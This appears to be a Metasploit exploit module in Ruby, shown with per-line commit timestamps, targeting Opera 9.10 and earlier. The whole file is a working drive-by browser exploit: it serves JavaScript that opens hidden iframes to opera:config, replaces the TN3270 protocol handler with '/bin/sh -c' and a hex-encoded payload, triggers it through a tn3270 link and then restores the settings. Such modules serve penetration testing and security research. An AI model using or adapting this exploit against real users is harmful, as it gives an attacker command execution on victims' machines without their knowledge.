2009-07-22 20:14:35 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2013-10-15 18:50:46 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2009-07-22 20:14:35 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
2016-03-07 08:56:58 +00:00
|
|
|
class Metasploit < Msf::Exploit::Remote
|
2013-08-30 21:28:54 +00:00
|
|
|
Rank = ExcellentRanking
|
2009-07-22 20:14:35 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
#
|
|
|
|
# This module acts as an HTTP server
|
|
|
|
#
|
|
|
|
include Msf::Exploit::Remote::HttpServer::HTML
|
2009-07-22 20:14:35 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
include Msf::Exploit::Remote::BrowserAutopwn
|
|
|
|
autopwn_info({
|
|
|
|
:ua_name => HttpClients::OPERA,
|
|
|
|
:ua_maxver => "9.10",
|
2014-09-29 20:34:35 +00:00
|
|
|
:os_name => [ OperatingSystems::Match::WINDOWS, OperatingSystems::Match::LINUX ],
|
2013-08-30 21:28:54 +00:00
|
|
|
:javascript => true,
|
|
|
|
:rank => ExcellentRanking, # reliable cmd exec, cleans up after itself
|
|
|
|
:vuln_test => nil,
|
|
|
|
})
|
2009-07-22 20:14:35 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,{
|
|
|
|
'Name' => 'Opera 9 Configuration Overwrite',
|
|
|
|
'Description' => %q{
|
|
|
|
Opera web browser in versions <= 9.10 allows unrestricted script
|
|
|
|
access to its configuration page, opera:config, allowing an
|
|
|
|
attacker to change settings and potentially execute arbitrary
|
|
|
|
code.
|
|
|
|
},
|
|
|
|
'License' => BSD_LICENSE,
|
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
'egypt', # stolen from mpack
|
|
|
|
],
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'OSVDB', '66472'],
|
|
|
|
],
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'EXITFUNC' => 'process',
|
|
|
|
'Space' => 2048,
|
|
|
|
'DisableNops' => true,
|
|
|
|
'BadChars' => " ",
|
|
|
|
},
|
2013-10-09 02:41:50 +00:00
|
|
|
'Platform' => %w{ unix },
|
2013-08-30 21:28:54 +00:00
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
#[ 'Opera < 9.10 Windows',
|
|
|
|
# {
|
|
|
|
# 'Platform' => 'win',
|
|
|
|
# 'Arch' => ARCH_X86,
|
|
|
|
# }
|
|
|
|
#],
|
|
|
|
[ 'Opera < 9.10 Unix Cmd',
|
|
|
|
{
|
|
|
|
'Platform' => 'unix',
|
|
|
|
'Arch' => ARCH_CMD,
|
|
|
|
}
|
|
|
|
],
|
|
|
|
],
|
|
|
|
# Not sure when this was disclosed but it's been known since at
|
|
|
|
# least March 5, 2007, since that's the release date on the version
|
|
|
|
# of mpack I stole this from.
|
|
|
|
'DisclosureDate' => 'Mar 5 2007',
|
|
|
|
'DefaultTarget' => 0
|
|
|
|
}))
|
|
|
|
end
|
2009-07-22 20:14:35 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def on_request_uri(cli, request)
|
|
|
|
print_status("Got request #{request.uri}")
|
2009-07-22 20:14:35 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
case request.uri
|
|
|
|
when get_resource
|
|
|
|
print_status("Sending #{self.name}")
|
|
|
|
content = "<body><script>"
|
|
|
|
content << generate_evil_js(cli, request)
|
|
|
|
content << "</script></body>"
|
|
|
|
headers = { 'Content-Type' => 'text/html' }
|
|
|
|
else
|
|
|
|
print_status("404ing request for #{request.uri}")
|
|
|
|
send_not_found(cli)
|
|
|
|
return
|
|
|
|
end
|
|
|
|
send_response_html(cli, content, headers)
|
2009-07-22 20:14:35 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
print_status("Done with request #{request.uri}")
|
|
|
|
end
|
2009-07-22 20:14:35 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def generate_evil_js(cli, request)
|
|
|
|
# There are a bunch of levels of quotes here, so the easiest way to
|
|
|
|
# make everything line up is to hex escape the command to run
|
|
|
|
p = regenerate_payload(cli).encoded
|
|
|
|
send_not_found(cli) && return if not p
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
shellcode = Rex::Text.to_hex(p, "%")
|
|
|
|
js = <<ENDJS
|
2009-07-22 20:14:35 +00:00
|
|
|
blank_iframe = document.createElement('iframe');
|
|
|
|
blank_iframe.src = 'about:blank';
|
|
|
|
blank_iframe.setAttribute('id', 'blank_iframe_window');
|
|
|
|
blank_iframe.setAttribute('style', 'display:none');
|
|
|
|
document.body.appendChild(blank_iframe);
|
|
|
|
blank_iframe_window.eval(
|
2013-08-30 21:28:54 +00:00
|
|
|
"config_iframe = document.createElement('iframe');" +
|
|
|
|
"config_iframe.setAttribute('id', 'config_iframe_window');" +
|
|
|
|
"config_iframe.src = 'opera:config';" +
|
|
|
|
"document.body.appendChild(config_iframe);" +
|
|
|
|
"cache_iframe = document.createElement('iframe');" +
|
|
|
|
"cache_iframe.src = 'opera:cache';" +
|
|
|
|
"cache_iframe.onload = function ()" +
|
|
|
|
"{" +
|
|
|
|
" config_iframe_window.eval" +
|
|
|
|
" (\\"" +
|
|
|
|
" old_handler = opera.getPreference('Network','TN3270 App');" +
|
|
|
|
" old_pref = opera.getPreference('User Prefs','Run TN3270 In Terminal');" +
|
|
|
|
" shellcode = '#{shellcode}';" +
|
|
|
|
" opera.setPreference('Network','TN3270 App','/bin/sh -c ' + unescape(shellcode));" +
|
|
|
|
" opera.setPreference('User Prefs','Run TN3270 In Terminal','0');" +
|
|
|
|
" app_link = document.createElement('a');" +
|
|
|
|
" app_link.setAttribute('href', 'tn3270://#{Rex::Text.rand_text_alpha(rand(5)+5)}');" +
|
|
|
|
" app_link.click();" +
|
|
|
|
" setTimeout(function () {opera.setPreference('Network','TN3270 App',old_handler)},1000);" +
|
|
|
|
" setTimeout(function () {opera.setPreference('User Prefs','Run TN3270 In Terminal',old_pref)},1000);" +
|
|
|
|
" \\");" +
|
|
|
|
"};" +
|
|
|
|
"document.body.appendChild(cache_iframe);" +
|
2009-07-22 20:14:35 +00:00
|
|
|
"");
|
|
|
|
ENDJS
|
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
2009-07-22 20:14:35 +00:00
|
|
|
|
|
|
|
end
|